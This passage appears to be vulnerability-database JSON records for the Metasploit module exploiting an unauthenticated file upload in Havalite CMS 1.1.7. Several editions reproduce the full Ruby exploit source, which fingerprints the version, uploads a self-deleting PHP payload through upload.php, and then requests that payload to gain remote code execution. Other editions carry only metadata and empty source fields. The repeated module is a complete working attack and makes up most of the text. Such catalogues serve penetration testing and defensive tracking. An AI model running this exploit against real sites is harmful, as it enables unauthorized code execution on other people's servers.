})\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-04-03T12:02:11", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "sourceHref"], "edition": 72}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": 
"exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T20:34:30", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload 
vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:34:30", "differentElements": ["sourceData"], "edition": 73}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-03T03:23:20", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-03T03:23:20", "differentElements": ["sourceData"], "edition": 74}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-03T05:26:48", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-03T05:26:48", "differentElements": ["sourceData"], "edition": 75}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-11T00:31:39", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T00:31:39", "differentElements": ["sourceData"], "edition": 76}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-11T02:33:24", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 1.8, "vector": "NONE", "modified": "2019-06-11T02:33:24"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429", "RHSA-2019:1424", "RHSA-2019:1423", "RHSA-2019:1422"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "ubuntu", "idList": ["USN-4014-2", "USN-4015-1", "USN-4016-1", "USN-4016-2"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}], "modified": "2019-06-11T02:33:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T02:33:24", "differentElements": ["sourceData"], "edition": 77}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-13T04:32:12", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2019-06-13T04:32:12"}, "dependencies": {"references": [{"type": "ubuntu", "idList": ["USN-4015-2", "USN-4014-2", "USN-4015-1", "USN-4016-1", "USN-4016-2"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32861"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}, {"type": "centos", "idList": ["CESA-2019:1310"]}], "modified": "2019-06-13T04:32:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-13T04:32:12", "differentElements": ["sourceData"], "edition": 78}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-13T06:27:45", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 2.0, "vector": "NONE", "modified": "2019-06-13T06:27:45"}, "dependencies": {"references": [{"type": "ubuntu", "idList": ["USN-4015-2", "USN-4014-2", "USN-4015-1", "USN-4016-2", "USN-4016-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32861"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}, {"type": "centos", "idList": ["CESA-2019:1310"]}], "modified": "2019-06-13T06:27:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n 
possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-13T06:27:45", "differentElements": ["sourceData"], "edition": 79}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-20T22:31:16", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 2.0, "vector": "NONE", "modified": "2019-06-13T06:27:45"}, "dependencies": {"references": [{"type": "ubuntu", "idList": ["USN-4015-2", "USN-4014-2", "USN-4015-1", "USN-4016-2", "USN-4016-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32861"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}, {"type": "centos", "idList": ["CESA-2019:1310"]}], "modified": "2019-06-13T06:27:45"}}, "objectVersion": 